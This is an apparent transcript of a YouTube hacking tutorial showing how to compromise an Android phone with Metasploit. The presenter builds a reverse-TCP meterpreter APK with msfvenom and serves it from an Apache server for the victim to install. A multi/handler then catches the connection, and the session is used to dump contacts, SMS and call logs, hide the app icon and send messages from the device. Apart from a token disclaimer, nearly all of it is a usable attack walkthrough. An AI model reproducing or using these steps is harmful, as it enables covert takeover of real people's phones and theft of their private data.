This channel does not promote or encourage any illegal activities. All contents provided by this channel is meant for educational purpose only.
Hello and welcome back to my new video. In today's world, the use of mobile phone has been increasing day by day. But with its increase, the quest for more security and privacy also increase. The privacy of our data on mobile phones is a question that should be asked seriously. Hacking on mobile phones is not a new thing. Since ages, people have been manipulating cell phones. So, can a mobile be hacked? Can somebody get access to your private data from your mobile device? These are the questions that come in all minds when they buy a smartphone or other devices. So today in this video I will show you how a hacker hacks a mobile phone. I will explain a very easy way which don't require a lot of geeky knowledge but a little knowledge of the Linux OS and an Android user that is not aware of Android security, which is almost 75% of mobile users in India are. So without further wasting delay, so let's start the video. So for performing the task we need only two things. First one is attacking machine, that can be Kali Linux, Ubuntu or any Linux based system, and the second one is victim machine, that is Android device or Android emulator. So the process can be broken into three parts. First one is generating an evil Android application, and the second one is installing the application into victim's mobile phone, and the last one will be waiting for him to run the application. Assuming you have attacker's machine set up and Metasploit installed in it. So first let me clear HT. As I was trying, and I have shoot this video 3 times but I forgot to start recording, so because of that I have to do it once more. So okay, so now as we are set to go, so let's create our payload by msf venom -p android meterpreter reverse tcp and lhost is equal to our local machine IP address, and port will be equal to, we'll take 7777 and -o and app.apk. So here P indicates that a payload type, that is our Android meterpreter and reverse TCP. So first let me clear this, also this, and also this, and now so sorry, I think I have typed reverse Android meterpreter reverse. Okay, so here -p indicates a payload type, and that is Android meterpreter reverse TCP. This specifies a interpreter shell which would come in from the target Android device. lhost is your IP, and lport is said to be a listening port, and -o for output file. Here we have used app.apk as the file name. This would take a little bit time as mine is generated. So now we will move our app on Apache server. So there we can download this on any device. So let's sudo mv for move and app.apk to var www.html. Okay, so now let's launch the attack, but before we should start our Apache server. So for that, service apache 2 start and fill our credentials. I think, sorry, yeah. So now everything is set. So let's fire up MSF console. MSF console and use multi handler, and now let's set the payload as the same which we generated previously, that is that payload Android interpreter reverse TCP. And now let's see the options. For that, show options, and now set the value of lhost and lport same as used in our payload. So for that, lhost to be our IP address and set lport, that was I think 777, yeah, 777. And now we are ready to go. So type exploit, and now let's get to our victim's machine and download our malicious APK. So we'll use 168.0.107 and app.apk. And so after downloading it, we have to install it. So yeah, okay. So like the interpreter session will be open if we run it. Like you can see now, you can type, sorry, let me close this, and help for getting the commands. Now you can retrieve any sensitive data from our victim and upload or delete or download any file or information. You can also find some network commands like networking. You can display interfaces. It will also display interfaces, and it will forward a local port to a remote service, that you can get an idea how dangerous it is. And you can view or modify the routing table, and you can get to know the apps installed. And for that, like app list, you can get to know all the apps installed here. We can extract contacts of our victims and messages. So like as you can see here, you can dump contacts, dump SMSs, dump call logs, check if the device is rooted. You can start an activity from a URI string, and you can locate, you can hide app icon like this one. We have our app and send SMS. So let's try sending SMS, and let's D for 1 2 3 4 5 6 7 8 9 0, and we'll send an SMS to him. I think, sorry, yeah, so -T for the message, and you have been hacked by cyber hacks, and as you can see it's successful. So let's check. You have been hacked by cyber hack. So for that, you can do is, if you don't want to be hacked, you can subscribe to cyber hacks, and you can do much more stuff. So there are a lot of more commands available in Meterpreter. You can explore yourself by help command, and so I think now you will never install any application from any unknown source. So that is it for today, guys. I hope you liked the video. If so, please leave a like below and subscribe to my channel, and also please comment below if you learned something new today. So